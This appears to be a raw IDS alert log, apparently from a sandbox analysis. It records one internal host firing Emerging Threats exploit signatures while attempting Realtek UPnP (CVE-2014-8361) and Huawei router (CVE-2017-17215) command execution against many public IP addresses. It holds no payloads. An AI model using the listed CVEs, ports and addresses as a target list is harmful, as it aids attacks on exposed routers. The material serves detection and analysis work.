                                      07/20/24-23:01:46.462339TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614153452869192.168.2.23125.67.244.75
                                      07/20/24-23:01:08.572556TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4465052869192.168.2.2364.43.73.86
                                      07/20/24-23:01:31.320338TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4189852869192.168.2.23199.241.141.173
                                      07/20/24-23:01:24.877747TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4817637215192.168.2.23191.115.236.117
                                      07/20/24-23:01:43.020186TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4086052869192.168.2.2332.76.174.48
                                      07/20/24-23:01:11.631549TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3586837215192.168.2.23197.11.75.129
                                      07/20/24-23:01:27.725851TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5754837215192.168.2.23197.43.142.84
                                      07/20/24-23:01:31.322288TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3444052869192.168.2.2340.226.47.93
                                      07/20/24-23:02:14.779973TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615253652869192.168.2.23167.89.14.43
                                      07/20/24-23:01:03.286497TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613487452869192.168.2.23134.167.171.74
                                      07/20/24-23:01:56.378726TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4043252869192.168.2.23175.65.204.131
                                      07/20/24-23:01:34.043784TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5724837215192.168.2.2341.76.96.139
                                      07/20/24-23:00:57.221338TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5912437215192.168.2.23157.236.245.35
                                      07/20/24-23:00:59.168569TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5839837215192.168.2.23197.247.106.185
                                      07/20/24-23:01:42.111275TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5421652869192.168.2.23142.105.178.104
                                      07/20/24-23:00:57.221803TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3674637215192.168.2.2341.173.160.14
                                      07/20/24-23:01:14.090830TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5992437215192.168.2.23197.128.170.53
                                      07/20/24-23:01:20.156820TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4176637215192.168.2.23157.151.81.4
                                      07/20/24-23:01:43.951862TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6071452869192.168.2.23115.59.47.171
                                      07/20/24-23:01:46.069088TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4086652869192.168.2.2365.170.62.168
                                      07/20/24-23:00:57.222129TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4080237215192.168.2.2341.157.99.54
                                      07/20/24-23:01:41.443693TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614854852869192.168.2.23132.180.52.133
                                      07/20/24-23:01:07.016889TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5508837215192.168.2.2362.123.128.166
                                      07/20/24-23:01:11.816101TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5765637215192.168.2.2341.176.109.210
                                      07/20/24-23:01:20.593003TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24401852869192.168.2.2351.20.137.216
                                      07/20/24-23:01:20.098209TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3726037215192.168.2.23197.242.27.50
                                      07/20/24-23:01:44.963815TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615805052869192.168.2.23132.247.218.225
                                      07/20/24-23:01:31.320338TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25713452869192.168.2.2340.231.162.161
                                      07/20/24-23:01:52.820390TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615491452869192.168.2.23158.140.216.184
                                      07/20/24-23:01:41.417573TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614812452869192.168.2.232.228.92.40
                                      07/20/24-23:01:43.474436TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5435052869192.168.2.23133.125.214.226
                                      07/20/24-23:01:20.600303TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5146652869192.168.2.23154.103.167.31
                                      07/20/24-23:01:44.449742TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614392452869192.168.2.23213.118.6.220
                                      07/20/24-23:01:47.159758TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4483252869192.168.2.2393.0.10.232
                                      07/20/24-23:01:49.836373TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3395452869192.168.2.2344.152.141.175
                                      07/20/24-23:01:12.807585TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24205252869192.168.2.2372.182.219.141
                                      07/20/24-23:01:01.367078TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614804252869192.168.2.2354.250.134.170
                                      07/20/24-23:01:45.078068TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4656252869192.168.2.2317.182.173.35
                                      07/20/24-23:01:53.735607TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23989052869192.168.2.2339.212.80.61
                                      07/20/24-23:01:45.414030TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5681452869192.168.2.2353.132.125.29
                                      07/20/24-23:01:02.048214TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3541437215192.168.2.2376.17.111.28
                                      07/20/24-23:01:24.862410TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4492037215192.168.2.23157.206.47.33
                                      07/20/24-23:01:20.132511TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5146237215192.168.2.23197.55.179.247
                                      07/20/24-23:01:21.951975TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4635437215192.168.2.23113.91.21.81
                                      07/20/24-23:01:50.107973TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24540852869192.168.2.23138.90.100.113
                                      07/20/24-23:01:31.974837TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3721037215192.168.2.2341.105.201.33
                                      07/20/24-23:01:52.582295TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3750852869192.168.2.23140.201.238.135
                                      07/20/24-23:01:40.349275TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5533437215192.168.2.2324.27.124.225
                                      07/20/24-23:01:59.938491TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614150652869192.168.2.23120.69.102.249
                                      07/20/24-23:01:27.664606TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5133637215192.168.2.23197.45.164.41
                                      07/20/24-23:01:26.151841TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615895652869192.168.2.23213.157.19.102
                                      07/20/24-23:01:08.567236TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25737052869192.168.2.23151.5.114.8
                                      07/20/24-23:01:11.822392TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5554637215192.168.2.23197.245.180.182
                                      07/20/24-23:01:44.894920TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5683252869192.168.2.23149.227.25.96
                                      07/20/24-23:01:55.359808TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613902252869192.168.2.23151.217.152.189
                                      07/20/24-23:01:34.048618TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4384237215192.168.2.23157.5.66.172
                                      07/20/24-23:01:01.410784TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614960252869192.168.2.23114.57.93.253
                                      07/20/24-23:01:31.982801TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3717237215192.168.2.23115.205.119.137
                                      07/20/24-23:01:02.259642TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5263852869192.168.2.23123.42.160.177
                                      07/20/24-23:01:02.762457TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4077852869192.168.2.23104.152.150.214
                                      07/20/24-23:01:42.912947TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613285252869192.168.2.23131.104.254.70
                                      07/20/24-23:01:45.134490TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5687252869192.168.2.2367.228.135.229
                                      07/20/24-23:02:06.767377TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614295452869192.168.2.2353.5.161.227
                                      07/20/24-23:01:07.005156TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6055637215192.168.2.23197.121.20.109
                                      07/20/24-23:01:08.594120TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4350052869192.168.2.23173.195.200.196
                                      07/20/24-23:01:42.555718TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23521652869192.168.2.23165.210.119.115
                                      07/20/24-23:01:43.555329TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25800452869192.168.2.2345.244.207.174
                                      07/20/24-23:01:42.778817TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4074652869192.168.2.23138.229.180.34
                                      07/20/24-23:01:00.641498TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4780637215192.168.2.23157.143.234.224
                                      07/20/24-23:01:25.472685TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615850052869192.168.2.2359.21.137.98
                                      07/20/24-23:01:47.931025TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24097652869192.168.2.2358.31.233.114
                                      07/20/24-23:01:47.892814TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25310852869192.168.2.23150.181.137.93
                                      07/20/24-23:01:42.499887TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613313052869192.168.2.23220.112.19.15
                                      07/20/24-23:01:40.296076TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4574437215192.168.2.2341.95.125.239
                                      07/20/24-23:01:25.302531TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4941052869192.168.2.23125.53.48.130
                                      07/20/24-23:01:47.807536TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4854652869192.168.2.23142.206.118.182
                                      07/20/24-23:01:58.249114TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5184852869192.168.2.2340.172.192.128
                                      07/20/24-23:01:08.585790TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5400652869192.168.2.2363.150.57.125
                                      07/20/24-23:01:32.039718TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3313637215192.168.2.2341.217.132.133
                                      07/20/24-23:01:12.807585TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5589852869192.168.2.2385.213.237.39
                                      07/20/24-23:01:43.571815TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25758452869192.168.2.23157.210.162.125
                                      07/20/24-23:01:07.082045TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5191437215192.168.2.23197.182.114.212
                                      07/20/24-23:01:08.683684TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23720652869192.168.2.23172.97.184.195
                                      07/20/24-23:01:46.893328TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24590452869192.168.2.2347.141.1.52
                                      07/20/24-23:01:51.562834TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615312852869192.168.2.23157.184.119.75
                                      07/20/24-23:01:44.700808TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23629652869192.168.2.23103.218.156.193
                                      07/20/24-23:01:12.807274TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5510852869192.168.2.23190.111.169.67
                                      07/20/24-23:01:49.172806TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5486852869192.168.2.2389.142.100.244
                                      07/20/24-23:01:42.664220TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5923452869192.168.2.2348.9.123.124
                                      07/20/24-23:01:11.028341TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5205052869192.168.2.23223.86.47.43
                                      07/20/24-23:01:42.632446TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5381052869192.168.2.23189.193.210.39
                                      07/20/24-23:01:53.356560TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615159252869192.168.2.23189.124.57.3
                                      07/20/24-23:01:31.978142TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5873437215192.168.2.23197.153.118.82
                                      07/20/24-23:01:07.054782TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3652037215192.168.2.23197.12.118.206
                                      07/20/24-23:01:47.749865TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615963852869192.168.2.23210.80.122.96
                                      07/20/24-23:01:08.677485TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5727652869192.168.2.23111.252.253.89
                                      07/20/24-23:01:31.974837TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3924837215192.168.2.23110.11.201.127
                                      07/20/24-23:02:09.668312TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615690852869192.168.2.23146.174.220.5
                                      07/20/24-23:01:31.326982TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4874652869192.168.2.23120.48.178.89
                                      07/20/24-23:01:02.854348TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4262252869192.168.2.23181.219.175.178
                                      07/20/24-23:01:40.336908TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5388037215192.168.2.23197.122.165.99
                                      07/20/24-23:01:27.650871TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5694037215192.168.2.23157.96.159.120
                                      07/20/24-23:01:11.816101TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3961037215192.168.2.2341.178.44.73
                                      07/20/24-23:01:08.599362TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25178852869192.168.2.23193.7.32.204
                                      07/20/24-23:01:31.312311TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24901052869192.168.2.23162.229.91.161
                                      07/20/24-23:01:43.173843TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614733452869192.168.2.23129.145.211.206
                                      07/20/24-23:01:31.311885TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4708252869192.168.2.23146.31.217.81
                                      07/20/24-23:01:40.275256TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4288637215192.168.2.2341.212.252.187
                                      07/20/24-23:01:42.507489TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23483852869192.168.2.23216.159.45.191
                                      07/20/24-23:01:40.323034TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3509837215192.168.2.23157.22.220.5
                                      07/20/24-23:01:04.230950TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4539237215192.168.2.2341.83.34.135
                                      07/20/24-23:01:42.093693TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613819252869192.168.2.23163.215.30.136
                                      07/20/24-23:01:47.163877TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24715652869192.168.2.23187.174.160.150
                                      07/20/24-23:01:45.414030TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25503652869192.168.2.23118.151.178.3
                                      07/20/24-23:01:48.161610TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6016852869192.168.2.2398.169.154.123
                                      07/20/24-23:01:42.790680TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615481252869192.168.2.23188.20.150.72
                                      07/20/24-23:01:43.903732TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3439052869192.168.2.23178.242.0.237
                                      07/20/24-23:01:02.054387TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4457437215192.168.2.2341.45.210.158
                                      07/20/24-23:01:00.639093TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4626037215192.168.2.23157.234.41.166
                                      07/20/24-23:01:45.648154TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5432652869192.168.2.23149.78.178.94
                                      07/20/24-23:02:04.022245TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614824052869192.168.2.23213.105.77.79
                                      07/20/24-23:01:31.975330TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4104037215192.168.2.23197.180.73.227
                                      07/20/24-23:02:00.709103TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24490252869192.168.2.2367.25.105.249
                                      07/20/24-23:01:40.322860TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3700237215192.168.2.23197.197.135.105
                                      07/20/24-23:01:14.060998TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5385837215192.168.2.23113.162.26.155
                                      07/20/24-23:01:04.142086TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615726252869192.168.2.23175.24.153.194
                                      07/20/24-23:01:14.105908TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5015837215192.168.2.2341.59.235.147
                                      07/20/24-23:01:14.111381TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5923237215192.168.2.2364.60.172.121
                                      07/20/24-23:01:27.654173TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4229437215192.168.2.23126.201.61.171
                                      07/20/24-23:01:47.693711TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25061052869192.168.2.23203.201.27.61
                                      07/20/24-23:01:02.076414TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4527837215192.168.2.23197.222.87.125
                                      07/20/24-23:01:53.122466TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615346452869192.168.2.2381.50.220.234
                                      07/20/24-23:02:04.133788TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615881852869192.168.2.2383.234.152.115
                                      07/20/24-23:01:34.044538TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3977037215192.168.2.2372.130.195.64
                                      07/20/24-23:01:46.159165TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24316052869192.168.2.23172.42.36.143
                                      07/20/24-23:01:46.220244TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83613729252869192.168.2.23117.120.22.241
                                      07/20/24-23:01:57.943877TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5012852869192.168.2.23103.180.88.194
                                      07/20/24-23:01:44.484644TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615146452869192.168.2.2399.207.71.238
                                      07/20/24-23:01:42.165780TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4455652869192.168.2.2359.109.143.129
                                      07/20/24-23:01:06.975117TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5131637215192.168.2.2341.211.71.10
                                      07/20/24-23:01:11.822392TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4241437215192.168.2.23157.93.68.27
                                      07/20/24-23:01:53.420758TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25985852869192.168.2.2372.136.42.217
                                      07/20/24-23:01:46.439689TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4883452869192.168.2.23129.145.211.206
                                      07/20/24-23:01:06.994337TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3682037215192.168.2.23197.179.239.59
                                      07/20/24-23:01:08.667512TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25896452869192.168.2.23107.75.193.125
                                      07/20/24-23:01:01.521998TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614156252869192.168.2.23157.99.82.194
                                      07/20/24-23:01:55.802130TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4996452869192.168.2.2369.58.59.239
                                      07/20/24-23:01:08.582150TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23722652869192.168.2.23171.201.20.41
                                      07/20/24-23:01:27.650975TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4113237215192.168.2.23123.227.180.114
                                      07/20/24-23:01:14.090830TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5500637215192.168.2.23141.121.89.226
                                      07/20/24-23:01:20.149798TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4701437215192.168.2.2319.58.9.63
                                      07/20/24-23:01:41.315380TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614704252869192.168.2.23163.212.66.23
                                      07/20/24-23:02:12.085791TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M23788652869192.168.2.23117.32.81.72
                                      07/20/24-23:01:14.117066TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4697037215192.168.2.23147.3.130.23
                                      07/20/24-23:00:57.221338TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4798237215192.168.2.23197.32.17.115
                                      07/20/24-23:01:42.010169TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24294652869192.168.2.23190.248.52.121
                                      07/20/24-23:01:58.001186TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4366252869192.168.2.23130.165.149.247
                                      07/20/24-23:01:41.298259TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5939252869192.168.2.2349.57.98.237
                                      07/20/24-23:00:59.213564TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6046437215192.168.2.2341.189.194.244
                                      07/20/24-23:01:51.290015TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614515252869192.168.2.23138.90.100.113
                                      07/20/24-23:01:44.392836TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83615689652869192.168.2.2394.208.23.95
                                      07/20/24-23:01:43.096223TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5673452869192.168.2.23170.47.68.177
                                      07/20/24-23:01:51.956762TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24252452869192.168.2.23164.23.204.131
                                      07/20/24-23:01:02.055683TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4052837215192.168.2.2341.179.196.52
                                      07/20/24-23:01:20.110861TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4318637215192.168.2.23104.171.59.59
                                      07/20/24-23:01:41.389908TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4850452869192.168.2.2337.169.126.92
                                      07/20/24-23:01:31.317668TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25669252869192.168.2.2397.193.3.141
                                      07/20/24-23:01:43.141970TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614544852869192.168.2.2350.218.167.53
                                      07/20/24-23:01:50.332163TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614933052869192.168.2.23162.125.127.147
                                      07/20/24-23:01:13.345185TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614350452869192.168.2.2353.137.194.88
                                      07/20/24-23:01:20.597058TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24054052869192.168.2.23207.246.209.117
                                      07/20/24-23:01:01.505774TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3545852869192.168.2.23126.16.187.60
                                      07/20/24-23:01:59.030101TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5042052869192.168.2.23118.229.228.64
                                      07/20/24-23:01:10.513310TCP2025132ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-83614694652869192.168.2.2398.89.247.140
                                      07/20/24-23:01:44.839991TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3868852869192.168.2.2352.182.197.150
                                      07/20/24-23:01:45.188773TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M24881852869192.168.2.2327.86.156.82
                                      07/20/24-23:01:40.311124TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3744837215192.168.2.23157.148.206.73
                                      07/20/24-23:01:41.482016TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6016052869192.168.2.23167.210.235.204
                                      07/20/24-23:01:08.613164TCP2831300ETPRO EXPLOIT Realtek SDK Miniigd UPnP SOAP RCE M25793452869192.168.2.23191.173.38.241
